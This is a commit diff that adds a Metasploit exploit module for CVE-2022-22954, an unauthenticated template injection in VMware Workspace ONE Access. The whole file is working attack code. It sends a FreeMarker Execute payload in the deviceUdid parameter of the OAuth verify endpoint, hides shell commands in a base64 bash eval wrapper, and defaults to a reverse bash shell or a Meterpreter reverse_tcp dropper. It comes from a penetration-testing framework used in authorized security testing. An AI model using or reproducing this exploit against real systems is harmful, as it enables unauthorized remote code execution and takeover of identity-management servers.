Add VMware Workspace ONE Access CVE-2022-22954

modules/exploits/linux/http/vmware_workspace_one_access_cve_2022_22954.rb

@@ -0,0 +1,120 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'VMware Workspace ONE Access CVE-2022-22954',
+        'Description' => %q{
+          This module exploits CVE-2022-22954, an unauthenticated server-side
+          template injection (SSTI) in VMware Workspace ONE Access, to execute
+          shell commands as the "horizon" user.
+        },
+        'Author' => [
+          'mr_me', # Discovery
+          'Sherlock Secure', # PoC
+          'wvu' # Exploit and independent analysis
+        ],
+        'References' => [
+          ['CVE', '2022-22954'],
+          ['URL', 'https://www.vmware.com/security/advisories/VMSA-2022-0011.html'],
+          ['URL', 'https://srcincite.io/advisories/src-2022-0005/'],
+          ['URL', 'https://github.com/sherlocksecurity/VMware-CVE-2022-22954'],
+          ['URL', 'https://attackerkb.com/topics/BDXyTqY1ld/cve-2022-22954/rapid7-analysis']
+          # https://twitter.com/wvuuuuuuuuuuuuu/status/1519476924757778433
+        ],
+        'DisclosureDate' => '2022-04-06',
+        'License' => MSF_LICENSE,
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Privileged' => false,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_bash'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :dropper,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 443,
+          'SSL' => true
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path', '/'])
+    ])
+  end
+
+  def check
+    res = execute_command("echo #{token = rand_text_alphanumeric(8..16)}")
+
+    return CheckCode::Unknown unless res
+    return CheckCode::Safe unless res.code == 400 && res.body.include?("device id: #{token}")
+
+    CheckCode::Vulnerable
+  end
+
+  def exploit
+    print_status("Executing #{payload_instance.refname} (#{target.name})")
+
+    case target['Type']
+    when :cmd
+      execute_command(payload.encoded)
+    when :dropper
+      execute_cmdstager
+    end
+  end
+
+  def execute_command(cmd, _opts = {})
+    bash_cmd = "bash -c {eval,$({echo,#{Rex::Text.encode_base64(cmd)}}|{base64,-d})}"
+
+    vprint_status("Executing command: #{bash_cmd}")
+
+    send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, '/catalog-portal/ui/oauth/verify'),
+      'vhost' => rand_text_alphanumeric(8..16),
+      'vars_get' => {
+        'error' => '',
+        'deviceUdid' => %(${"freemarker.template.utility.Execute"?new()("#{bash_cmd}")})
+      }
+    }, 3.5)
+  end
+
+end